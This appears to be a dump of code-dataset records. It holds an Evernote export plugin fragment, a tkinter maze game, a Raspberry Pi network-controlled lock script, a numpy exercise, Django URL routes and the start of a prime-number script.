send_book_to_evernote(self, book_id):\n return self.send_book_to_evernote_if_nb(book_id, False)\n\n\n def send_book_to_evernote_if_nb(self, book_id, uses_send_filters):\n # Get the current metadata for this book from the db\n metadata = self.db.get_metadata(book_id, index_is_id=True,\n get_cover=True, cover_as_data=True)\n \n if uses_send_filters:\n annotations_raw = self.get_annotations_raw_from_metadata(metadata)\n annotations_raw = '' if annotations_raw == None else annotations_raw\n if self.SENT_STAMP in annotations_raw:\n return False\n if self.ANNOTATIONS_PRESENT_STRING not in annotations_raw:\n return False\n \n noteName = self.make_evernote_name(metadata)\n myAnnotations = self.make_evernote_content(metadata)\n self.create_note(noteName, myAnnotations, self.note_store)\n self.stamp_annotations_if_nb(book_id)\n return True\n\n\n def get_annotations_raw(self, book_id):\n metadata = self.db.get_metadata(book_id, index_is_id=True,\n get_cover=True, cover_as_data=True)\n return self.get_annotations_raw_from_metadata(metadata)\n\n\n def get_annotations_raw_from_metadata(self, metadata):\n return metadata.get('comments')\n\n\n def set_annotations_raw(self, book_id, annotations):\n self.db.set_comment(book_id, annotations)\n self.db.commit()\n \n #stamp annotations if need be\n def stamp_annotations_if_nb(self, book_id):\n annotes = self.get_annotations_raw(book_id) \n annotes = '' if annotes == None else annotes \n commentStamp = self.SENT_STAMP\n if commentStamp not in annotes:\n self.set_annotations_raw(book_id, commentStamp + annotes)\n\n\n def make_evernote_name(self, metadata):\n return metadata.get('title')\n\n\n def make_evernote_content(self, metadata):\n annotations = self.get_annotations_raw_from_metadata(metadata)\n soup = BeautifulSoup(annotations)\n plainAnnotations = '
' + '
\\n
'.join(soup.findAll(text=True)) + '
' \n myAnnotations = plainAnnotations.encode('ascii', errors='ignore').encode('utf-8') \n content = ''\n content += ''\n content += ''\n content += myAnnotations\n content += ''\n return content\n\n\n def create_note(self, title, content, note_store):\n note = Types.Note()\n note.title = title\n note.content = content\n if prefs['tagsCsv']:\n note.tagNames = prefs['tagsCsv'].split(\",\")\n if prefs['notebook']:\n nb_guid = self.create_evernote_notebook_if_not_exits()\n if not nb_guid:\n return\n note.notebookGuid = nb_guid\n try:\n created_note = note_store.createNote(note)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return\n\n\n def create_evernote_notebook_if_not_exits(self):\n nb_name = prefs['notebook']\n if not self.connect_to_evernote():\n return\n nb_guid = self.get_notebook_guid_if_exists(nb_name)\n if not nb_guid:\n notebook = Types.Notebook()\n notebook.name = nb_name\n try:\n created_nb = self.note_store.createNotebook(notebook)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return\n nb_guid = created_nb.guid\n print(\"Successfully created a new notebook with GUID: \" + created_nb.guid)\n return nb_guid\n\n\n def get_notebook_guid_if_exists(self, nb_name):\n try:\n for nb in self.note_store.listNotebooks():\n if nb.name.lower() == nb_name.lower(): # TODO: make note of this caviat in docs\n print(nb_name + \" Notebook exists already GUID: \" + nb.guid)\n self.cached_prefs_notebook_guid = nb.guid\n return nb.guid\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return None\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294423261","text":"# Import module \nfrom tkinter import *\nimport tkinter\nfrom winsound import *\nimport winsound\nfrom tkinter import 
messagebox\n\n# from glob import glob\n\n\n\n# Create object \nroot = Tk() \nroot.title(\"Create by @SomPhors\")\n# Adjust size \nroot.geometry(\"1000x600\") \nroot.resizable(0,0)\n\n# Create Canvas \ncanvas1 = Canvas( root, width = 800, height = 600) \ncanvas1.pack(fill = \"both\", expand = True) \n\n\n# Variable................................................................................................\nlevelArray = []\nlevelnumber = []\narray = []\nclicksound = True\nheartnumber = 0\nRight = False\nLeft = False\nDown = False\nUp = False\npoint = 0\nwin = False\nLose = False\n# Function ....................................................................................................................\n\n# Display sound................................................................................................................\ndef displaysound():\n global clicksound\n if clicksound:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\click.wav\", winsound.SND_FILENAME)\n\n# Drawing.......................................................................................................................\ndef drawgraphic():\n global array,point\n positionX = 200\n positionY = 30\n for n in range(len(array)):\n for r in range(len(array[n])):\n\n if array[n][r] == 1:\n canvas1.create_image( positionX, positionY, image = wall, anchor = \"nw\", tags=\"wall\")\n elif array[n][r] == 2:\n canvas1.create_image( positionX, positionY, image = spacecrafter1, anchor = \"nw\", tags=\"craft\")\n elif array[n][r] == 3:\n canvas1.create_image( positionX, positionY, image = Earth, anchor = \"nw\", tags=\"craft\")\n elif array[n][r] == 5 or array[n][r] == 6:\n canvas1.create_image( positionX, positionY, image = Animy, anchor = \"nw\", tags=\"animy\")\n elif array[n][r] == 0:\n canvas1.create_image( positionX, positionY, image = coin3, anchor = \"nw\", tags=\"gold\")\n\n elif array[n][r] == 4:\n canvas1.create_rectangle( positionX, positionY, positionX+30, 
positionY+30, outline=\"white\", fill=\"white\", tags=\"craft\")\n positionX +=30\n positionX = 200\n positionY += 30\n canvas1.create_text(840, 80, text = \"Point: \"+str(point), fill=\"white\", font=\"DotGothic16 14 italic bold\", tags=\"point\")\n if win:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n messagebox.showinfo(message=\"You Win\")\n\n elif Lose:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\gameover5.wav\", winsound.SND_FILENAME)\n canvas1.create_image( 300, 200, image = over, anchor = \"nw\", tags=\"over\")\n messagebox.showinfo(message=\"Game over\")\n\n# Delete heart.................................................................................................................\ndef lift():\n global heartnumber, Lose\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\lose4.wav\",\n winsound.SND_FILENAME)\n heartnumber += 1\n print(heartnumber)\n if heartnumber == 1:\n canvas1.delete(\"heart1\")\n elif heartnumber == 2:\n canvas1.delete(\"heart2\")\n elif heartnumber == 3:\n canvas1.delete(\"heart3\")\n elif heartnumber == 4:\n Lose = True\n\n# Check spacecraft.............................................................................................................\ndef findSpacecraft():\n global array, Down, Left, Right, Up, point, win\n \n spacecraft = []\n for num1 in range(len(array)):\n for num2 in range(len(array[num1])):\n if array[num1][num2] == 2:\n spacecraft.append(num2)\n spacecraft.append(num1)\n if Up:\n if array[spacecraft[1]-1][spacecraft[0]] == 0 or array[spacecraft[1]-1][spacecraft[0]] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]-1][spacecraft[0]] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]-1][spacecraft[0]] == 5 or array[spacecraft[1]-1][spacecraft[0]] == 6:\n lift()\n elif array[spacecraft[1]-1][spacecraft[0]] 
== 3:\n win = True\n Up = False\n\n elif Down:\n if array[spacecraft[1]+1][spacecraft[0]] == 0 or array[spacecraft[1]+1][spacecraft[0]] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]+1][spacecraft[0]] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]+1][spacecraft[0]] == 5 or array[spacecraft[1]+1][spacecraft[0]] == 6:\n lift()\n elif array[spacecraft[1]+1][spacecraft[0]] == 3:\n win = True\n Down = False\n\n elif Right:\n if array[spacecraft[1]][spacecraft[0]+1] == 0 or array[spacecraft[1]][spacecraft[0]+1] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]][spacecraft[0]+1] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]][spacecraft[0]+1] == 5 or array[spacecraft[1]][spacecraft[0]+1] == 6:\n lift()\n elif array[spacecraft[1]][spacecraft[0]+1] == 3:\n win = True\n Right = False\n\n elif Left:\n if array[spacecraft[1]][spacecraft[0]-1] == 0 or array[spacecraft[1]][spacecraft[0]-1] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]][spacecraft[0]-1] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]][spacecraft[0]-1] == 5 or array[spacecraft[1]][spacecraft[0]-1] == 6:\n lift()\n elif array[spacecraft[1]][spacecraft[0]-1] == 3:\n win =True\n Left = False\n canvas1.delete(\"craft\")\n canvas1.delete(\"animy\")\n canvas1.delete(\"gold\")\n canvas1.delete(\"point\")\n drawgraphic()\n\n# Go Up.......................................................................................................................\ndef goUp(event):\n global Up\n Up = True\n findSpacecraft()\n\n# Go Down......................................................................................................................\ndef goDown(event):\n global 
Down\n Down = True\n findSpacecraft()\n\n# Go Right.....................................................................................................................\ndef goRight(event):\n global Right\n Right = True\n findSpacecraft()\n\n# Go Left......................................................................................................................\ndef goLeft(event):\n global Left\n Left =True\n findSpacecraft()\n\n# Exit from game................................................................................................................\ndef Exit(event):\n displaysound()\n canvas1.delete(\"bggraphic\")\n canvas1.delete(\"wall\")\n canvas1.delete(\"exit\")\n canvas1.delete(\"heart1\")\n canvas1.delete(\"heart2\")\n canvas1.delete(\"heart3\")\n canvas1.delete(\"craft\")\n canvas1.delete(\"animy\")\n canvas1.delete(\"gold\")\n # canvas1.delete(\"display\")\n canvas1.delete(\"over\")\n\n\n# Choose level..................................................................................................................\ndef find(event):\n global levelArray,levelnumber,bg,array,point\n displaysound()\n\n canvas1.create_image( 0, 0, image = bggraphic, anchor = \"nw\", tags=\"bggraphic\") \n canvas1.create_image( 800, 10, image = heart, anchor = \"nw\", tags=\"heart1\")\n canvas1.create_image( 850, 10, image = heart, anchor = \"nw\", tags=\"heart2\")\n canvas1.create_image( 900, 10, image = heart, anchor = \"nw\", tags=\"heart3\")\n\n level = 1\n for index in range(len(levelArray)):\n if (levelArray[index][0] <= event.x and levelArray[index][2] >= event.x) and (levelArray[index][1] <= event.y and levelArray[index][3] >= event.y):\n level = index+1\n \n file = open(\"E:\\\\SomPhors_VC1_Algorithm\\\\files\\\\\"+str(level)+\".txt\", \"r\")\n array = file.read()\n array = array.split(';')\n for i in range(len(array)):\n array[i] = array[i].strip('\\n')\n array[i] = array[i].split(',')\n for j in range(len(array[i])):\n array[i][j] = int(array[i][j])\n # 
print(array)\n file.close()\n \n canvas1.create_rectangle(0, 0, 70, 40, outline=\"black\", fill=\"#2C6CAC\", tags=\"exit\")\n canvas1.create_text(35, 20, text = \"Exit\", fill=\"white\", font=\"Times 14 italic bold\", tags=\"exit\")\n\n drawgraphic()\n\ndef back(event):\n global bg,startbg\n displaysound()\n canvas1.delete(\"back\")\n canvas1.delete(\"level\")\n canvas1.delete(\"image\")\n startbg()\n\n# Delete Setting................................................................................................................\ndef remove(event):\n displaysound()\n canvas1.delete(\"remove\")\n canvas1.delete(\"delete\")\n canvas1.delete(\"soundon\")\n canvas1.delete(\"soundoff\")\n canvas1.delete(\"musicon\")\n canvas1.delete(\"musicoff\")\n canvas1.delete(\"senario\")\n canvas1.move(\"welcome\", 0, 100)\n\n# Display levels................................................................................................................\ndef startNew(event):\n global bg,X,Y,levelArray\n displaysound()\n X = 180\n Y = 100\n number = 1\n levelArray = []\n canvas1.create_image( 0, 0, image = bglevel, anchor = \"nw\", tags=\"image\")\n canvas1.create_text(50, 40, text = \"<<\", fill=\"white\", font=\"Times 30 italic bold\", tags=\"back\")\n \n for n in range(3):\n for r in range(5):\n Array = []\n levelnumber.append(number)\n X1 = X+100\n Y1 = Y+100\n canvas1.create_rectangle(X, Y, X1, Y1, outline=\"black\", fill=\"white\", tags=\"level\")\n canvas1.create_text(X+50, Y+50, text = number, fill=\"orange\", font=\"Times 35 italic bold\", tags=\"level\")\n Array.append(X)\n Array.append(Y)\n Array.append(X1)\n Array.append(Y1)\n X +=130\n number += 1\n levelArray.append(Array)\n Y += 130\n X = 180 \n\n# Setting display............................................................................................................\ndef settingNew(event):\n displaysound()\n canvas1.move(\"welcome\", 0, -100)\n canvas1.create_rectangle(300, 100, 700, 500, fill=\"white\", 
tags=\"delete\")\n canvas1.create_text(680, 125, text = \"X\", fill=\"black\", font=\"Oswald 25 italic bold\", tags=\"remove\")\n if clicksound:\n canvas1.create_image( 330, 160, image = soundOn, anchor = \"nw\", tags=\"soundon\")\n canvas1.create_text(500, 210, text = \"Sound On\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundon\")\n else:\n canvas1.create_image( 330, 160, image = soundOff, anchor = \"nw\", tags=\"soundoff\")\n canvas1.create_text(500, 210, text = \"Sound Off\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundoff\")\n canvas1.create_image( 330, 270, image = soundOn, anchor = \"nw\", tags=\"musicon\")\n canvas1.create_text(500, 330, text = \"Music On\", fill=\"black\", font=\"Times 18 bold\", tags=\"musicon\")\n\n \n\n# Identify Sound ............................................................................................................\ndef ClickMusicOff(event):\n displaysound()\n canvas1.delete(\"musicoff\")\n canvas1.create_image( 330, 270, image = soundOn, anchor = \"nw\", tags=\"musicon\")\n canvas1.create_text(500, 330, text = \"Music On\", fill=\"black\", font=\"Times 18 bold\", tags=\"musicon\")\n\ndef ClickSoundOff(event):\n global clicksound\n clicksound = True\n canvas1.delete(\"soundoff\")\n canvas1.create_image( 330, 160, image = soundOn, anchor = \"nw\", tags=\"soundon\")\n canvas1.create_text(500, 210, text = \"Sound On\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundon\")\n\ndef ClickSoundOn(event):\n global clicksound\n displaysound()\n clicksound = False\n canvas1.delete(\"soundon\")\n canvas1.create_image( 330, 160, image = soundOff, anchor = \"nw\", tags=\"soundoff\")\n canvas1.create_text(500, 210, text = \"Sound Off\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundoff\")\ndef ClickMusicOn(event):\n displaysound()\n canvas1.delete(\"musicon\")\n canvas1.create_image( 330, 270, image = soundOff, anchor = \"nw\", tags=\"musicoff\")\n canvas1.create_text(500, 330, text = \"Music Off\", fill=\"black\", 
font=\"Times 18 bold\", tags=\"musicoff\")\n\n# Quit diplay................................................................................................................\ndef quitNew(event):\n displaysound()\n canvas1.move(\"welcome\", 0, -100)\n canvas1.create_rectangle(300, 100, 700, 500, fill=\"white\", tags=\"delete\")\n canvas1.create_text(680, 115, text = \"X\", fill=\"black\", font=\"Oswald 25 italic bold\", tags=\"remove\")\n canvas1.create_text(350, 190, anchor=W, font=\"Purisa\",text=\"- Step1: Click start to choose levels.\", tags=\"senario\")\n canvas1.create_text(350, 220, anchor=W, font=\"Purisa\",text=\"- Step2: Spacecraft find the way go to Earth.\", tags=\"senario\")\n canvas1.create_text(410, 250, anchor=W, font=\"Purisa\",text=\"But have some animy on the way.\", tags=\"senario\")\n canvas1.create_text(350, 280, anchor=W, font=\"Purisa\",text=\"- Step3: If spacecraft meet animy it will lose 1 lift.\", tags=\"senario\")\n canvas1.create_text(410, 310, anchor=W, font=\"Purisa\",text=\"If spacecraft lose 3 lift Game over!\", tags=\"senario\")\n canvas1.create_text(410, 340, anchor=W, font=\"Purisa\",text=\"If spacecraft arrive Earth it will Win\", tags=\"senario\")\n\n#Start game.....................................................................................................................\ndef startbg():\n global bg\n\n canvas1.create_image( 0, 0, image = space, anchor = \"nw\") \n\n \n # Add Text \n canvas1.create_text(500, 150, text = \"Welcome to the maze game!!!\", fill=\"#0D4D8D\", font=\"Times 35 italic bold\", tags=\"welcome\")\n \n #Start\n canvas1.create_rectangle(430, 220, 610, 280, fill=\"white\", tags=\"start\")\n canvas1.create_text(515, 250, text = \"Start\", fill=\"black\", font=\"Times 35 italic bold\", tags=\"start\")\n\n # Setting\n canvas1.create_rectangle(430, 320, 610, 380, fill=\"white\", tags=\"setting\")\n canvas1.create_text(515,350, text = \"Setting\", fill=\"black\", font=\"Times 35 italic bold\", 
tags=\"setting\")\n\n # Quit\n canvas1.create_rectangle(430, 420, 610, 480, fill=\"white\", tags=\"quit\")\n canvas1.create_text(515, 450, text = \"Quit\", fill=\"black\", font=\"Times 35 italic bold\", tags=\"quit\")\n \n \n# First of game...............................................................................................................\ndef begin():\n canvas1.create_text(500, 550, text = \"Loading...\", fill=\"white\", font=\"Times 20 italic bold\", tags=\"welcome\")\n canvas1.after(2000, startbg)\n\n# ClickOn.....................................................................................................................\ncanvas1.tag_bind(\"start\", \"\", startNew)\ncanvas1.tag_bind(\"setting\", \"\", settingNew)\ncanvas1.tag_bind(\"quit\", \"\", quitNew)\ncanvas1.tag_bind(\"remove\", \"\", remove)\n\ncanvas1.tag_bind(\"back\", \"\", back)\ncanvas1.tag_bind(\"level\", \"\", find)\ncanvas1.tag_bind(\"exit\", \"\", Exit)\n\nroot.bind(\"\", goUp)\nroot.bind(\"\", goDown)\nroot.bind(\"\", goRight)\nroot.bind(\"\", goLeft)\n\ncanvas1.tag_bind(\"next\", \"\", Exit)\ncanvas1.tag_bind(\"exitlose\", \"\", Exit)\n\ncanvas1.tag_bind(\"soundon\", \"\", ClickSoundOn)\ncanvas1.tag_bind(\"musicon\", \"\", ClickMusicOn)\ncanvas1.tag_bind(\"soundoff\", \"\", ClickSoundOff)\ncanvas1.tag_bind(\"musicoff\", \"\", ClickMusicOff)\ncanvas1.tag_bind(\"over\", \"\", Exit)\n\n# Image........................................................................................................................\n\nbg = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\start.gif\") \ncanvas1.create_image( 0, 0, image = bg, anchor = \"nw\", tags=\"bg1\")\n\nspace = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\Cartoon_spaceship_dn.png\") \nbglevel = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\level.png\") \nspacecrafter1 = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\playerShip2_orange.png\") \nEarth = PhotoImage(file = 
\"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\Earth.png\") \nbggraphic = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\spaces.gif\") \nheart = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\hearts.png\") \nsoundOn = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\soundOn.png\") \nsoundOff = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\soundOff.png\") \nAnimy = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\robot_walk1.png\") \n\ncoin3 = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\gold_3.png\") \n\nwall = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\stoneCenter.png\") \nover = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\over.gif\") \n\n\nbegin()\n\n\n# Execute tkinter \nroot.mainloop()","sub_path":"maze_Game.py","file_name":"maze_Game.py","file_ext":"py","file_size_in_byte":17417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503074790","text":"import requests\nimport time\nimport json\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(7,GPIO.OUT)\np = GPIO.PWM(7,50)\np.start(7.5)\np.ChangeDutyCycle(0)\n\nsleepTime = 5\nwith open(\"lockname.txt\") as f:\n lockKey = f.read()\n \nwith open(\"lockstatus.txt\") as f:\n lockStatus = f.read()\n \nprint(lockKey)\nprint(lockStatus)\nOPEN = False\nTEST = False\nINITIALISE = False\nlockname = \"\"\n\nif lockStatus != \"init\":\n print(\"lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\nelse:\n print(\"lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\n\n\nwhile True:\n try:\n with open(\"lockname.txt\") as g:\n lockKey = g.read()\n \n with open(\"lockstatus.txt\") as g:\n lockStatus = g.read()\n \n if lockStatus == \"init\":\n while OPEN!= True:\n\n\n r =requests.get(url =\"http://pygmalion.redbrick.dcu.ie:7726/queue/\", params = \"\")\n\n cont = 
str(r.content)[2:-1]\n print(cont)\n if cont!=\"queue is empty\":\n cont = cont.replace(\"\\'\", \"\\\"\")\n jsonload = json.loads(cont)\n if lockKey in jsonload:\n if jsonload[lockKey] == \"open\":\n OPEN = True\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delqueue/\", json ={lockKey:\"del\"})\n print(\"Lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(5)\n print(\"lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n OPEN = False\n p.ChangeDutyCycle(0)\n \n else:\n while TEST == False and INITIALISE == False:\n\n\n r =requests.get(url =\"http://pygmalion.redbrick.dcu.ie:7726/initqueue/\", params = \"\")\n\n cont = str(r.content)[2:-1]\n print(cont)\n if cont!=\"queue is empty\":\n cont = cont.replace(\"\\'\", \"\\\"\")\n jsonload = json.loads(cont)\n \n if lockKey in jsonload:\n if jsonload[lockKey] == \"test\":\n TEST = True\n elif jsonload[lockKey] == \"init\":\n INITIALISE = True\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n \n if TEST == True:\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delinitqueue/\", json ={lockKey:\"del\"})\n print(\"Lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(5)\n print(\"lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(0.5)\n TEST = False\n p.ChangeDutyCycle(0)\n \n elif INITIALISE == True:\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delinitqueue/\", json ={lockKey:\"del\"})\n f = open(\"lockstatus.txt\", \"w\")\n f.write(\"init\")\n f.close()\n print(\"Lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\n \n except KeyboardInterrupt:\n p.stop()\n 
GPIO.cleanup()\n\n\n\n\n\n","sub_path":"code/RPi/lockCheck.py","file_name":"lockCheck.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"610846379","text":"import numpy as np\r\nn=4\r\np=3\r\nmy_array1 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array1):\r\n print(i, j, x, sep=';')\r\n m=input(f'введите значение: [{i},{j}]: ')\r\n my_array1[i, j]=float(m)\r\nprint(my_array1)\r\nmy_array2 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array2):\r\n print(i, j, x, sep=';')\r\n m=input(f'введите значение: [{i},{j}]: ')\r\n my_array2[i, j]=float(m)\r\nprint(my_array2)\r\nmy_array3 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array3):\r\n if my_array1[i, j]>my_array2[i, j]:\r\n my_array3[i, j]=my_array1[i, j]\r\n else:\r\n my_array3[i, j]=my_array2[i, j]\r\nprint('наибольшие значения массивов', my_array3)","sub_path":"Lab3_dop_ex1.py","file_name":"Lab3_dop_ex1.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283558277","text":"from django.conf.urls import url\n\nfrom .views.views_indicators import (\n indicator_create,\n CollectedDataCreate,\n CollectedDataUpdate,\n CollectedDataDelete,\n IndicatorCreate,\n IndicatorDelete,\n IndicatorUpdate,\n IndicatorExport,\n IndicatorReportData,\n CollectedDataReportData,\n collecteddata_import,\n service_json,\n PeriodicTargetView,\n PeriodicTargetDeleteView,\n collected_data_view,\n program_indicators_json,\n programIndicatorReport,\n indicator_report,\n IndicatorReport,\n IndicatorDataExport,\n TVAReport,\n DisaggregationReport,\n TVAPrint,\n DisaggregationPrint,\n api_indicator_view)\n\nfrom .views.views_reports import (\n IPTTReportQuickstartView,\n IPTT_ReportView,\n IPTT_ReportIndicatorsWithVariedStartDate,\n IPTT_ExcelExport,\n create_pinned_report,\n delete_pinned_report,\n 
IPTT_ExcelExport,\n IPTT_CSVExport\n)\n\n\nurlpatterns = [\n url(r'^indicator_create/(?P\\d+)/$', indicator_create, name='indicator_create'),\n\n url(r'^indicator_add/(?P\\d+)/$', IndicatorCreate.as_view(), name='indicator_add'),\n\n url(r'^indicator_update/(?P\\d+)/$', IndicatorUpdate.as_view(), name='indicator_update'),\n\n url(r'^indicator_delete/(?P\\d+)/$', IndicatorDelete.as_view(), name='indicator_delete'),\n\n url(r'^periodic_target_delete/(?P\\d+)/$', PeriodicTargetDeleteView.as_view(), name='pt_delete'),\n\n url(r'^periodic_target_generate/(?P\\d+)/$', PeriodicTargetView.as_view(), name='pt_generate'),\n\n url(r'^periodic_target_deleteall/(?P\\d+)/(?P\\w+)/$',\n PeriodicTargetView.as_view(), name='pt_deleteall'),\n\n url(r'^collecteddata_add/(?P\\d+)/(?P\\d+)/$',\n CollectedDataCreate.as_view(), name='collecteddata_add'),\n\n url(r'^collecteddata_import/$', collecteddata_import, name='collecteddata_import'),\n\n url(r'^collecteddata_update/(?P\\d+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),\n\n url(r'^collecteddata_delete/(?P\\d+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),\n\n url(r'^report/(?P\\d+)/(?P\\d+)/(?P\\d+)/$', indicator_report, name='indicator_report'),\n\n url(r'^tvareport/$', TVAReport.as_view(), name='tvareport'),\n\n url(r'^tvaprint/(?P\\d+)/$', TVAPrint.as_view(), name='tvaprint'),\n\n url(r'^disrep/(?P\\d+)/$', DisaggregationReport.as_view(), name='disrep'),\n\n url(r'^disrepprint/(?P\\d+)/$', DisaggregationPrint.as_view(), name='disrepprint'),\n\n url(r'^report_table/(?P\\d+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorReport.as_view(), name='indicator_table'),\n\n url(r'^program_report/(?P\\d+)/$', programIndicatorReport, name='programIndicatorReport'),\n\n\n url(r'^export/(?P\\d+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorExport.as_view(), name='indicator_export'),\n\n url(r'^service/(?P[-\\w]+)/service_json/', service_json, name='service_json'),\n\n url(r'^collected_data_table/(?P\\d+)/(?P\\d+)/',\n 
collected_data_view, name='collected_data_view'),\n\n url(r'^program_indicators/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)', program_indicators_json, name='program_indicators_json'),\n\n url(r'^report_data/(?P\\w+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorReportData.as_view(), name='indicator_report_data'),\n\n url(r'^report_data/(?P\\w+)/(?P\\d+)/(?P\\d+)/'\n r'export/$',\n IndicatorExport.as_view(),\n name='indicator_export'),\n\n url(r'^collecteddata_report_data/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)/$',\n CollectedDataReportData.as_view(),\n name='collecteddata_report_data'),\n\n url(r'^collecteddata_report_data/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)/export/$',\n IndicatorDataExport.as_view(),\n name='collecteddata_report_data_export'),\n\n url(r'^iptt_quickstart/', IPTTReportQuickstartView.as_view(), name='iptt_quickstart'),\n\n url(r'^iptt_report/(?P\\d+)/(?P\\w+)/$', IPTT_ReportView.as_view(), name='iptt_report'),\n\n url(r'^iptt_redirect/(?P\\d+)/$', IPTT_ReportIndicatorsWithVariedStartDate.as_view(),\n name='iptt_redirect'),\n\n url(r'^iptt_excel/(?P\\d+)/(?P\\w+)/$', IPTT_ExcelExport.as_view(), name='iptt_excel'),\n\n url(r'^pinned_report/$', create_pinned_report, name='create_pinned_report'),\n url(r'^pinned_report/delete/$', delete_pinned_report, name='delete_pinned_report'),\n\n url(r'^iptt_csv/(?P\\d+)/(?P\\w+)/$', IPTT_CSVExport.as_view(), name='iptt_csv'),\n\n # API call for program page\n url(r'^api/indicator/(?P\\d+)', api_indicator_view, name='api_indicator_view'),\n]\n","sub_path":"indicators/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157447322","text":"import time\r\n\r\n\r\n# # def create_list(r1, r2):\r\n# # \"\"\"Create list of prime numbers between r1 and r2.\"\"\"\r\n\r\n# # # Testing if range r1 and r2 are equal\r\n# # if r1 == r2:\r\n# # return r1\r\n# # else:\r\n# # # Create empty lists\r\n# # res = [] # reserve\r\n# # poss = [] # 
